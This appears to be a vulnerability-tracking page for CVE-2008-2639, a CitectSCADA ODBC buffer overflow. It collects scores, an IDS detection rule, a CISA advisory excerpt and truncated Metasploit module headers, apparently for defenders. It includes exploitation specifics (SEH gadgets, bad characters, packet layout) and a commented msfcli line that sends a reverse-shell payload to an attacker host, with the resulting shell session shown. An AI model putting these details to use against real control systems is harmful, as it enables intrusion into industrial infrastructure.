CVE-2008-2639
published 2008-06-16CVE-2008-2639: Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbitrary code…
PriorityP273high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
77.72%
99.5th percentile
Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbitrary code via a long string in the second application packet in a TCP session on port 20222.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citect | citectfacilities | — | — |
| citect | citectscada | — | — |
| citect | citectscada | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 20222 (msg:"ET SCADA CitectSCADA ODBC Overflow Attempt"; flow:established,to_server; dsize:4; byte_test:4,>,399,0; reference:cve,2008-2639; reference:url,www.digitalbond.com/index.php/2008/09/08/ids-signature-for-citect-vuln/; reference:url,digitalbond.com/tools/quickdraw/vulnerability-rules; classtype:attempted-user; sid:2008542; rev:8; metadata:created_at 2010_07_30, cve CVE_2008_2639, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
- →The exploit sends two TCP packets to port 20222: first a 4-byte length prefix, then the malicious ODBC payload. Detection should look for an initial 4-byte packet with a value greater than 399 on port 20222 (as captured by the ET rule's dsize:4 + byte_test). ↗
- →The overflow is triggered in the second application packet of the TCP session on port 20222. The packet begins with a 5-byte header (0x02 + 4-byte big-endian length) followed by the oversized payload string. ↗
- →The exploit uses a null-byte-free payload (BadChars: \x00) with a stack adjustment of -3500 bytes and SEH-based exploitation via pop/pop/ret gadgets in CiExceptionMailer.dll or Citect32.exe. ↗
- →The EXITFUNC is set to 'thread', meaning the shellcode exits via thread termination — useful for distinguishing exploit payloads from benign traffic. ↗
- ·The ET Snort rule (sid:2008542) triggers only on the initial 4-byte length packet (dsize:4, value >399) and will not fire on the actual payload packet. This may miss variants that send a combined packet.
- ·Return addresses (ROP gadgets) vary significantly by Citect version and OS. CiExceptionMailer.dll can be arbitrarily remapped by other DLLs, making static RET address detection unreliable across environments. ↗
- ·The vulnerability affects CitectSCADA 6 and 7 and CitectFacilities 7, but the Metasploit module was also tested against v5. Patched status of v7+ is noted as 'presumably patched' but not confirmed for all sub-versions. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3mhh-v2cc-54m6: Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbit
ghsa_unreviewed·2022-05-01
CVE-2008-2639 [HIGH] CWE-119 GHSA-3mhh-v2cc-54m6: Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbit
Stack-based buffer overflow in the ODBC server service in Citect CitectSCADA 6 and 7, and CitectFacilities 7, allows remote attackers to execute arbitrary code via a long string in the second application packet in a TCP session on port 20222.
CISA ICS
GLEG Agora SCADA+ Exploit Pack
cisa_ics·2018-09-06
GLEG Agora SCADA+ Exploit Pack
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
GLEG Agora SCADA+ Exploit Pack
Last RevisedSeptember 06, 2018
Alert CodeICSA-11-096-01
## OVERVIEW
On March 15, 2011, GLEG Ltd. announced the Agora SCADA+ Exploit Pack for Immunity’s CANVAS system. CANVAS is a penetration testing framework that is extensible using CANVAS Exploit Packs. On March 25, 2011, GLEG announced it would be adding exploits for the 35 vulnerabilities released by Luigi Auriemma on March 21, 2011. The ICS-CERT has not received any reports of this tool being used for an unauthorized compromise of an actual control system installation.
ICS-CERT has prepared t
Suricata
ET SCADA CitectSCADA ODBC Overflow Attempt
suricata·2010-07-30
CVE-2008-2639 ET SCADA CitectSCADA ODBC Overflow Attempt
ET SCADA CitectSCADA ODBC Overflow Attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 20222 (msg:"ET SCADA CitectSCADA ODBC Overflow Attempt"; flow:established,to_server; dsize:4; byte_test:4,>,399,0; reference:cve,2008-2639; reference:url,www.digitalbond.com/index.php/2008/09/08/ids-signature-for-citect-vuln/; reference:url,digitalbond.com/tools/quickdraw/vulnerability-rules; classtype:attempted-user; sid:2008542; rev:8; metadata:created_at 2010_07_30, cve CVE_2008_2639, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
CitectSCADA/CitectFacilities ODBC - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-14
CVE-2008-2639 CitectSCADA/CitectFacilities ODBC - Remote Buffer Overflow (Metasploit)
CitectSCADA/CitectFacilities ODBC - Remote Buffer Overflow (Metasploit)
---
##
# $Id: citect_scada_odbc.rb 11039 2010-11-14 19:03:24Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CitectSCADA/CitectFacilities ODBC Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.
This has only been tested against Citect v5, v6 and v7.
},
'Author' =>
[
'KF ', # Original Metasploit module
'patrick', # Some clean up - I'm sure there's more to be done :)
],
'Version' => '$Revision: 11039
Exploit-DB
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2008-09-05·CVSS 7.6
CVE-2008-2639 [HIGH] CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: citect_scada_odbc.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Citect\CitectSCADA\Bin>
#
# Arbi
Metasploit
CitectSCADA/CitectFacilities ODBC Buffer Overflow
metasploit
CitectSCADA/CitectFacilities ODBC Buffer Overflow
CitectSCADA/CitectFacilities ODBC Buffer Overflow
This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon. This has only been tested against Citect v5, v6 and v7.
No writeups or analysis indexed.
http://isc.sans.org/diary.html?storyid=4556http://secunia.com/advisories/30638http://securityreason.com/securityalert/3944http://securitytracker.com/id?1020241http://www.coresecurity.com/?action=item&id=2186http://www.kb.cert.org/vuls/id/476345http://www.kb.cert.org/vuls/id/CTAR-7ENQNHhttp://www.securityfocus.com/archive/1/493272/100/0/threadedhttp://www.securityfocus.com/bid/29634http://www.vupen.com/english/advisories/2008/1834/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42992https://www.exploit-db.com/exploits/6387http://isc.sans.org/diary.html?storyid=4556http://secunia.com/advisories/30638http://securityreason.com/securityalert/3944http://securitytracker.com/id?1020241http://www.coresecurity.com/?action=item&id=2186http://www.kb.cert.org/vuls/id/476345http://www.kb.cert.org/vuls/id/CTAR-7ENQNHhttp://www.securityfocus.com/archive/1/493272/100/0/threadedhttp://www.securityfocus.com/bid/29634http://www.vupen.com/english/advisories/2008/1834/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42992https://www.exploit-db.com/exploits/6387
2008-06-16
Published